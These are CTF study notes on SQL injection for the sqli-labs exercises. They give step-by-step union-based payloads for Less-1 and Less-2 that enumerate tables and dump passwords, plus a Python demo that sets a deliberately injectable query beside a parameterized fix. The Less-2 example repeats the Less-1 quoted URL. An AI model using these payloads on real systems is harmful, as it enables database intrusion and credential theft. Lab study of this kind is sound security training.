CTF
- SQL injection
- less1 GET - Error based - Single quotes - String
- less 2 GET - Error based - Integer based
- less 3 GET - Error based - Single quotes with twist string
- less 4 GET - Error based - Double Quotes - String
- less 5 GET - Double Injection - Single Quotes - String
- less 6 GET - Double Injection - Double Quotes - String
- less 7 GET - Dump into outfile - String
- less 8 GET - Blind - Boolean Based - Single Quotes
- less 9 GET - Blind - Time based - Single Quotes
- less 10 GET - Blind - Time based - double quotes
SQL injection
Starting 20 March 2021 I have been working through buuoj, tackling SQL injection problems.
less1 GET - Error based - Single quotes - String
Approach:
1. Inject a ' character and check whether an error is reported.
2. Guess the column count: after the ' append union select 1,2,3# to probe the number of columns, and note which positions are echoed back. Characters can be URL-encoded.
3. Use union select 1,(select group_concat(table_name) from information_schema.tables),3# to list all table names.
4. Use union select 1,(select group_concat(column_name) from information_schema.columns where table_schema = database() and table_name = 'target table'),3# to list the columns of the table of interest, then find the flag.
http://localhost/sqli-labs/Less-1/?id=-1' or 1=1 union select 1,2,concat_ws(char(32,58,32),id,database(),password) from users limit 1,1 --+
less 2 GET - Error based - Integer based
1. Inject a ' character and check whether an error is reported.
2. Guess the column count: after the ' append union select 1,2,3# to probe the number of columns, and note which positions are echoed back. Characters can be URL-encoded. Here it still errors, so try reading with a non-existent id and appending union select after it; the result is echoed back, so it works.
3. Use union select 1,(select group_concat(table_name) from information_schema.tables),3# to list all table names.
4. Use union select 1,(select group_concat(column_name) from information_schema.columns where table_schema = database() and table_name = 'target table'),3# to list the columns of the table of interest, then find the flag.
http://localhost/sqli-labs/Less-1/?id=-1' or 1=1 union select 1,2,concat_ws(char(32,58,32),id,database(),password) from users limit 1,1 --+
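Added illustration of the two query shapes the Less-1 (quoted string) and Less-2 (bare integer) steps above rely on, placed next to the parameterized form that closes the hole; this is not code from sqli-labs or from these notes. The users table, its rows and the `WHERE id='$id' LIMIT 0,1` / `WHERE id=$id LIMIT 0,1` query shapes are assumptions, and SQLite stands in for MySQL, so the information_schema steps are not reproduced.

```python
import sqlite3

# Constructed demo rows standing in for the lab's users table (not real data).
SEED = [(1, "alice", "pw-alice"), (2, "bob", "pw-bob"), (3, "carol", "pw-carol")]


def connect() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)", SEED)
    return db


def build_query(user_id: str, quoted: bool) -> str:
    """String-concatenated query (assumed shapes): the Less-1 style wraps the
    id in single quotes, the Less-2 style pastes it in bare."""
    literal = f"'{user_id}'" if quoted else user_id
    return f"SELECT id, username, password FROM users WHERE id={literal} LIMIT 0,1"


def vulnerable_lookup(db, user_id: str, quoted: bool = True):
    return db.execute(build_query(user_id, quoted)).fetchone()


def safe_lookup(db, user_id: str):
    # Parameter binding: the value is never spliced into the SQL text.
    sql = "SELECT id, username, password FROM users WHERE id=? LIMIT 0,1"
    return db.execute(sql, (user_id,)).fetchone()


def reports_error(lookup, db, user_id: str) -> bool:
    """Step 1 of the notes: does a stray quote make the query fail?"""
    try:
        lookup(db, user_id)
        return False
    except sqlite3.Error:
        return True


# Steps 2-4 in the notes build on this union shape; here it only pulls the
# password column through the echoed row (no information_schema in SQLite).
PAYLOAD_STRING = "-1' union select 1,2,password from users limit 1,1 --+"
PAYLOAD_INT = "-1 union select 1,2,password from users limit 1,1 --+"

if __name__ == "__main__":
    db = connect()
    print("quote probe, concatenated:", reports_error(vulnerable_lookup, db, "1'"))
    print("quote probe, parameterized:", reports_error(safe_lookup, db, "1'"))
    print("union, concatenated:", vulnerable_lookup(db, PAYLOAD_STRING))
    print("union, parameterized:", safe_lookup(db, PAYLOAD_STRING))
```

With concatenation the quote probe raises a database error and the union returns a row from another user; with binding the same inputs are just a non-matching id value, which is also why such apps should log the failed lookup rather than echo the driver's error text.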